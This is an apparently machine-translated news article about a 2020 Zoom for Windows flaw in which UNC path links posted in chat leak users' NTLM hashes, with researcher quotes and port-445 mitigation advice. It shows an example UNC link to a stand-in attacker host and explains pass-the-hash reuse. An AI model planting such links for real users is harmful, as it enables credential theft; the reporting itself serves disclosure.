Watch out for Zoom for Windows users: The widespread software has a vulnerability that could allow an attacker to steal your operating system credentials.
The vulnerability, which is not currently patched, has been discovered because zoom use has increased significantly in the wake of the corona virus pandemic. With a large number of people working from home, they rely on Zoom to connect with employees, customers, and partners. Many of these home users use temporary or improvised means to connect to sensitive work networks that do not have the advantage of local firewalls for companies.
Embed the network location here
Attacks use the Zoom Chat window to send targets a text string that represents the network location on the Windows device they are using. The Zoom app for Windows automatically converts these so-called universal naming convention strings such as //attacker.example.com/C$ into clickable links. If targets click on these links in networks that are not completely blocked, Zoom sends the Windows user names and the corresponding NTLM hashes to the address contained in the link.
Attackers can then use the credentials to access shared network resources such as Outlook servers and storage devices. Typically, resources on a Windows network accept the NTLM hash when authenticating a device. This leaves the networks open for so-called pass-the-hash attacks, for which no cracking technique is required to convert the hash into the corresponding plain text password.
"It's quite a shortcoming of Zoom," said Matthew Hickey, co-founder of the security boutique Hacker House. "It is a very trivial mistake. With more of us working from home now, it is even easier to take advantage of this mistake."
The vulnerability was first described last week by a researcher using the Twitter handle @ _g0dmode. He wrote: “With #Zoom Chat, you can post links like x.x.x.x xyz to try to capture Net-NTLM hashes when other users click on them.
In # Zoom Chat, you can post links like x.x.x.x xyz to try to capture Net-NTLM hashes when other users click on them.
– Mitch (@ _g0dmode), March 23, 2020
On Tuesday, Hickey expanded the discovery. In a tweet, he showed how the Zoom Windows client revealed the credentials that were used to access restricted parts of a Windows network.
"Hi @zoom_us & @NCSC," wrote Hickey. “Here is an example of using the Zoom Windows client using UNC path injection to provide credentials for use in SMBRelay attacks. The following screenshot shows an exemplary UNC path link and the disclosed (edited) credentials. "
The screenshot shows the Windows user name as Bluemoon / HackerFantastic. The NTLM hash is displayed immediately below, although Hickey has edited most of it in the picture he posted.
Hello @zoom_us & @NCSC – here is an example of using the Zoom Windows client using UNC path injection to provide credentials for use in SMBRelay attacks. The following screenshot shows an exemplary UNC path link and the disclosed (edited) credentials. pic.twitter.com/gjWXas7TMO
– Hacker Fantastic (@hackerfantastic) March 31, 2020
Attacks can be carried out by people who pretend to be legitimate participants in the meeting, or in so-called zoom bomb attacks, in which trolls access a meeting that is not password-protected and bomb everyone else with offensive or harassing images.
While the attack only works against Windows users, Hickey says attacks can be launched using any form of zoom by sending targets to a UNC location in a text message. If Windows users click the link while connected to certain unsecured computers or networks, the Zoom app sends the credentials through port 445, which is used to transfer traffic related to Windows SMB and Active Directory services.
If port 445 is closed to the Internet – either by a device or a network firewall, or by an ISP that is blocking it – the attack will not work. However, it is hardly self-evident that this exit is closed in the networks of many zoom users. Due to the events of the past month, millions of people have worked from home without the same IT and security support that they get on the job. This makes port 445 more likely to be open, either by mistake or because the port is needed to connect to corporate resources.
Zoom representatives did not respond to an email sent on Tuesday to receive a comment on this post. This post will be updated if an answer comes later. In the meantime, Windows users should be very suspicious of chat messages that contain links. If possible, users should also ensure that port 445 is either blocked or can only access trusted addresses on the Internet.